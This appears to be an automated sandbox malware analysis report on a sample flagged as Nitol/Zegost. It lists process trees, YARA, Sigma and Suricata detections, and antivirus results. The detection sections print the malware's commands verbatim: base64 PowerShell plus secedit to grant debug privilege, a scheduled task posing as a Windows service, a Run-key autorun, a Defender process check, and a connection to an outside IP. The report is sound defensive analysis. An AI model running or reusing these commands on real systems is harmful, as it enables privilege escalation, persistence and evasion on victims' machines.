cmd.exe (PID: 4124 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4996 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7648 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7592 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 5824 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4956 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 1524 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1196 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7284 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2748 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3948 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 892 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 1256 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 3944 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6436 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7196 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 6492 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5284 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3876 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7620 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 5396 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6588 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7952 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6700 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 760 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6204 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 2820 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2372 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7284 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6224 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 5272 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3712 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7200 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 6584 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 64 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2504 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

svchost.exe (PID: 3200 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\Microsoft\Program\ziliao.jpg	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
C:\ProgramData\Microsoft\Program\ziliao.jpg	JoeSecurity_Nitol	Yara detected Nitol	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000002.00000003.2065312855.000000000616E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
00000020.00000002.4546923156.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: irsetup.exe PID: 5800	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: powershell.exe PID: 4956	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x8725:$b1: ::WriteAllBytes( 0x25a14:$b1: ::WriteAllBytes( 0x605c2:$b1: ::WriteAllBytes( 0x63d8e:$b1: ::WriteAllBytes( 0x66d86:$b1: ::WriteAllBytes( 0x6b4bd:$b1: ::WriteAllBytes( 0x6b7c2:$b1: ::WriteAllBytes( 0xbf30c:$b1: ::WriteAllBytes( 0xbf614:$b1: ::WriteAllBytes( 0xbfb31:$b1: ::WriteAllBytes( 0xc0055:$b1: ::WriteAllBytes( 0xca27f:$b1: ::WriteAllBytes( 0xca584:$b1: ::WriteAllBytes( 0xcee80:$b1: ::WriteAllBytes( 0xd02f3:$b1: ::WriteAllBytes( 0xd0e25:$b1: ::WriteAllBytes( 0x15a826:$b1: ::WriteAllBytes( 0x1a0642:$b1: ::WriteAllBytes( 0x1a0947:$b1: ::WriteAllBytes( 0x8776:$b2: ::FromBase64String( 0x25a65:$b2: ::FromBase64String(
Process Memory Space: iusb3mon.exe PID: 3680	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
32.2.iusb3mon.exe.4c30607.2.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
32.2.iusb3mon.exe.4c30607.2.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
32.2.iusb3mon.exe.4d70000.4.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
32.2.iusb3mon.exe.4d70000.4.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
32.2.iusb3mon.exe.4c30607.2.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
32.2.iusb3mon.exe.4d305bf.3.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
32.2.iusb3mon.exe.4c30607.2.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
32.2.iusb3mon.exe.4d305bf.3.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
2.3.irsetup.exe.616e5ff.0.raw.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
2.3.irsetup.exe.616e5ff.0.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
32.2.iusb3mon.exe.4d70000.4.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
32.2.iusb3mon.exe.4d70000.4.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
32.2.iusb3mon.exe.4d305bf.3.unpack	JoeSecurity_Zegost	Yara detected Zegost	Joe Security
32.2.iusb3mon.exe.4d305bf.3.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
2.3.irsetup.exe.616e5ff.0.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Base64 Encoded PowerShell Command Detected

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe" , ParentImage: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe, ParentProcessId: 4072, ParentProcessName: LxN_oT.exe, ProcessCommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", ProcessId: 4956, ProcessName: powershell.exe

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe" , CommandLine: "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe, NewProcessName: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe, OriginalFileName: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5064, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe" , ProcessId: 4072, ProcessName: LxN_oT.exe

Sigma detected: Parent in Public Folder Suspicious Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe" , ParentImage: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe, ParentProcessId: 4072, ParentProcessName: LxN_oT.exe, ProcessCommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", ProcessId: 1532, ProcessName: powershell.exe

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Sigma detected: Suspicious Program Location with Network Connections

Source: Network Connection

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 118.107.45.13, DestinationIsIpv6: false, DestinationPort: 25445, EventID: 3, Image: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe, Initiated: true, ProcessId: 4072, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49757

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Program\iusb3mon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe, ProcessId: 4072, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft

Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification

Source: Registry Key set

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine|base64offset|contains: ~>z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5655410 "__IRAFN:C:\Users\user\Desktop\Whyet-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003", ParentImage: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe, ParentProcessId: 5800, ParentProcessName: irsetup.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, ProcessId: 6076, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3200, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T16:03:38.923018+0100	2022482	1	A Network Trojan was detected	192.168.2.5	49713	104.21.81.224	443	TCP
2024-12-29T16:03:45.497191+0100	2022482	1	A Network Trojan was detected	192.168.2.5	49736	104.21.81.224	80	TCP
2024-12-29T16:03:47.231584+0100	2022482	1	A Network Trojan was detected	192.168.2.5	49737	104.21.81.224	443	TCP

ET MALWARE JS/Nemucod.M.gen downloading EXE payload

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T16:03:39.325163+0100	2021954	1	A Network Trojan was detected	104.21.81.224	443	192.168.2.5	49713	TCP
2024-12-29T16:03:47.634438+0100	2021954	1	A Network Trojan was detected	104.21.81.224	443	192.168.2.5	49737	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2
Source: C:\ProgramData\Program\iusb3mon.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen2

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\Microsoft\Program\ziliao.jpg

ReversingLabs: Detection: 13%

Multi AV Scanner detection for submitted file

Source: Whyet-4.9.exe	Virustotal: Detection: 12%			Perma Link
Source: Whyet-4.9.exe	ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.7% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Documents\VCH0Sag8\LxN_oT.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\Program\iusb3mon.exe	Joe Sandbox ML: detected

